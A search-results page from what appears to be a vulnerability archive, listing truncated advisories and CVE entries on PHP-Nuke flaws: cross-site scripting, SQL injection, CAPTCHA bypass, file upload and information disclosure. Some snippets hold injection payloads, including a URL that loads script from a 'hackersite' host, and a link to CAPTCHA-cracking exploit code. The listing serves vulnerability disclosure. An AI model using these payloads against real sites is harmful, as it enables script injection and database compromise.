1732 matches found
Cross-Site Scripting vulnerabilities in PHP-Nuke
Hello 3APA3A! I am reporting Cross-Site Scripting vulnerabilities I found in PHP-Nuke. XSS: POST request on the page http://site/modules.php?name=YourAccount&op=newuser "script src=http://site/script.js In the fields: gfxcheck and randomnum. Exploit:...
phpnuke79te-sql.txt
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc. PHP-Nuke AutoHTML Module 2.0 - cross-site scripting...
Cross-Site Scripting vulnerability in AutoHTML for PHP-Nuke
Hello 3APA3A! I am reporting a Cross-Site Scripting vulnerability I found in AutoHTML for PHP-Nuke. XSS: http://site/autohtml.php?filename=3Cscript20src=http://hackersite/xss.js20 The vulnerable version is PHP-Nuke AutoHTML Module 2.0 and potentially other versions. Additional information about this...
phpkuran-sql.txt
Author : Lovebug Italy Rbt-4 Crew www.rbt-4.net PHP-Nuke Module KuraniKerim sid SQL Injection Bug : modules.php?name=KuraniKerim&op=TurkceNukeComIslamiModullerDestekSitesi&sid = S Q L Exploit...
PHP-Nuke KuiraniKerim Module - sid SQL Injection
PHP-Nuke KuiraniKerim Module - sid SQL Injection source: https://www.securityfocus.com/bid/29261/info The 'KuiraniKerim' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this iss...
PHP-Nuke 'KuiraniKerim' Module - 'sid' SQL Injection
source: https://www.securityfocus.com/bid/29261/info The 'KuiraniKerim' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...
CVE-2008-2020
The CAPTCHA implementation as used in (1) Francisco Burzi PHP-Nuke 7.0 and 8.1, (2) my123tkShop e-Commerce-Suite (aka 123tkShop) 0.9.1, (3) phpMyBitTorrent 1.2.2, (4) TorrentFlux 2.3, (5) e107 0.7.11, (6) WebZE 0.5.9, (7) Open Media Collectors Database (aka OpenDb) 1.5.0b4, and (8) Labgab 1.1 uses a code_bg.jpg...
CVE-2008-2020
The CVE-2008-2020 issue affects multiple CAPTCHA implementations: PHP-Nuke (versions 7.0–8.1), my123tkShop 0.9.1, phpMyBitTorrent 1.2.2, TorrentFlux 2.3, e107 0.7.11, WebZE 0.5.9, Open Media Collectors Database 1.5.0b4, and Labgab 1.1. The root cause is use of a code_bg.jpg background with PHP Im...
PT-2008-3540 · Francisco Burzi +7 · Php-Nuke +7
Name of the Vulnerable Software and Affected Versions: Francisco Burzi PHP-Nuke versions 7.0 through 8.1 my123tkShop e-Commerce-Suite version 0.9.1 phpMyBitTorrent version 1.2.2 TorrentFlux version 2.3 e107 version 0.7.11 WebZE version 0.5.9 Open Media Collectors Database version 1.5.0b4 Labgab...
PHP-Nuke DownloadsPlus Module - Arbitrary File Upload
source: https://www.securityfocus.com/bid/28919/info The DownloadsPlus module for PHP-Nuke is prone to a vulnerability that lets remote attackers upload and execute arbitrary code because the application fails to sanitize user-supplied input. This issue permits attackers to upload arbitrary files...
PHP-Nuke DownloadsPlus Module - Arbitrary File Upload
PHP-Nuke DownloadsPlus Module - Arbitrary File Upload source: https://www.securityfocus.com/bid/28919/info The DownloadsPlus module for PHP-Nuke is prone to a vulnerability that lets remote attackers upload and execute arbitrary code because the application fails to sanitize user-supplied input...
Deciphering the PHP-Nuke Captcha
The Captcha used in the current version 8.1 of PHP Nuke can be deciphered with 100% accuracy. More information can be found here: http://www.rooksecurity.com/blog/?p=6 Exploit Code: http://www.rooksecurity.com/exploits/phpnukecaptcha.zip What is so interesting about this captcha is that it is...
CVE-2008-1680
PHP-Nuke Platinum 7.6.b.5 allows remote attackers to obtain configuration information via a direct request to maintenance/index.php, which reveals settings such as magic_quotes_gpc...
Information disclosure
PHP-Nuke Platinum 7.6.b.5 allows remote attackers to obtain configuration information via a direct request to maintenance/index.php, which reveals settings such as magic_quotes_gpc...
CVE-2008-1680
CVE-2008-1680 affects PHP-Nuke Platinum 7.6.b.5, where a direct request to maintenance/index.php allows remote attackers to disclose configuration information, including settings such as magic_quotes_gpc. The issue is categorized as information disclosure with a CVSS v2 base score of 5.0 (Network...
CVE-2008-1680
PHP-Nuke Platinum 7.6.b.5 allows remote attackers to obtain configuration information via a direct request to maintenance/index.php, which reveals settings such as magic_quotes_gpc...
CVE-2008-1539
SQL injection vulnerability in includes/dynamictitles.php in PHP-Nuke Platinum 7.6.b.5 allows remote attackers to execute arbitrary SQL commands via the p parameter to modules.php for the Forums module...
Sql injection
SQL injection vulnerability in includes/dynamictitles.php in PHP-Nuke Platinum 7.6.b.5 allows remote attackers to execute arbitrary SQL commands via the p parameter to modules.php for the Forums module...
CVE-2008-1539
SQL injection vulnerability in includes/dynamictitles.php in PHP-Nuke Platinum 7.6.b.5 allows remote attackers to execute arbitrary SQL commands via the p parameter to modules.php for the Forums module...